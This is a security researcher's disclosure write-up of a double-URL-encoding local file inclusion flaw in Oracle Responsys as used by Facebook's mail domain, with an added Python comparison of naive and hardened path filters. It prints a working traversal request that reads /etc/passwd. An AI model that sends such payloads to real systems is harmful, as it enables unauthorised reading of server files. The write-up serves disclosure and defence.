How I Uncovered a Critical LFI Vulnerability in Oracle Responsys Cloud Service
The article details the discovery of a local file inclusion (LFI) flaw in Oracle Responsys, explains how crafted requests exploit the _ri_ parameter to read arbitrary files, highlights the impact on major companies like Facebook and LinkedIn, and describes the responsible disclosure that led to a rapid patch.
Today I demonstrate how I discovered a local file inclusion (LFI) vulnerability in Oracle Responsys cloud service, which is used by many enterprises such as Facebook, LinkedIn, and Dropbox.
Responsys, originally a leading B2C cloud‑marketing software provider, was acquired by Oracle in 2013 and now integrates with Oracle's suite of cloud services.
Responsys assigns each client a private IP for accessing its cloud services.
Vulnerability Discovery
While reviewing emails from [email protected], I noticed the domain em.facebookmail.com linked to Responsys. A dig lookup confirmed the association.
The original email contained a link like:
http://em.facebookmail.com/pub/cc?_ri_=X0Gzc2X%3DWQpglLjHJlYQGkSIGbc52zaRY0i6zgzdzc6jpzcASTGzdzeRfAzbzgJyH0zfzbLVXtpKX%3DSRTRYRSY&_ei_=EolaGGF4SNMvxFF7KucKuWNhjeSKbKRsHLVV55xSq7EoplYQTaISpeSzfMJxPAX8oMMhFTpOYUvvmgn-WhyT6yBDeImov65NsCKxmYwyOL0

Testing showed that double URL encoding of the _ri_ parameter is not properly handled, allowing injection of arbitrary paths such as “%252fetc%252fpasswd”:
http://em.facebookmail.com/pub/sf/%252fetc%252fpasswd?_ri_=X0Gzc2X%3DYQpglLjHJlYQGrzdLoyD13pHoGgHNjCWGRBIk4d6Uw74cgmmfaDIiK4za7bf4aUdgSVXMtX%3DYQpglLjHJlYQGnnlO8Rp71zfzabzewzgLczg7Ulwbazahw8uszbNYzeazdMjhDzcmJizdNFCXgn&_ei_=Ep0e16vSBKEscHnsTNRZT2jxEz5WyG1Wpm_OvAU-aJZRZ_wzYDw97ETX_iSmseE

This directory‑traversal injection exposes server files, indicating insufficient input validation.
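As an added example (not Oracle's or the article author's code), the check below shows why a filter that URL-decodes a path segment only once misses the `%252fetc%252fpasswd` traversal described above, beside a hardened version that decodes until the value is stable and confines the result to an assumed base directory (`/var/www/pub/sf`, constructed for the example).

```python
from urllib.parse import unquote
from pathlib import PurePosixPath

# Assumed document root for the /pub/sf/ handler (constructed for this example).
BASE_DIR = PurePosixPath("/var/www/pub/sf")

def naive_is_safe(segment: str) -> bool:
    """Weak check: decode once, then look for traversal characters.
    "%252fetc%252fpasswd" decodes to "%2fetc%2fpasswd", which contains
    neither "/" nor "..", so this wrongly accepts it."""
    decoded = unquote(segment)
    return "/" not in decoded and ".." not in decoded

def full_decode(value: str, max_rounds: int = 5) -> str:
    """Decode until the string stops changing, bounded so deeply nested
    encoding cannot make the check loop indefinitely."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def resolve_under_base(segment: str, base: PurePosixPath = BASE_DIR) -> PurePosixPath:
    """Hardened check: fully decode, reject absolute paths and NUL bytes,
    collapse "." and ".." components, and refuse anything that climbs
    above the base directory. Returns the confined path."""
    decoded = full_decode(segment)
    if decoded.startswith("/") or "\x00" in decoded:
        raise ValueError("absolute path or NUL byte rejected")
    resolved = []
    for part in decoded.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not resolved:
                raise ValueError("path escapes base directory")
            resolved.pop()
        else:
            resolved.append(part)
    return base.joinpath(*resolved)

def hardened_is_safe(segment: str) -> bool:
    # Boolean wrapper around resolve_under_base for side-by-side comparison.
    try:
        resolve_under_base(segment)
        return True
    except ValueError:
        return False
```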
Broader Impact
Similar LFI issues were found on other companies using Responsys, such as LinkedIn, as shown in screenshots.
The vulnerability can leak sensitive information or allow full server compromise, posing a serious risk to all Responsys customers.
I reported the issue to Oracle, and it was patched within a week.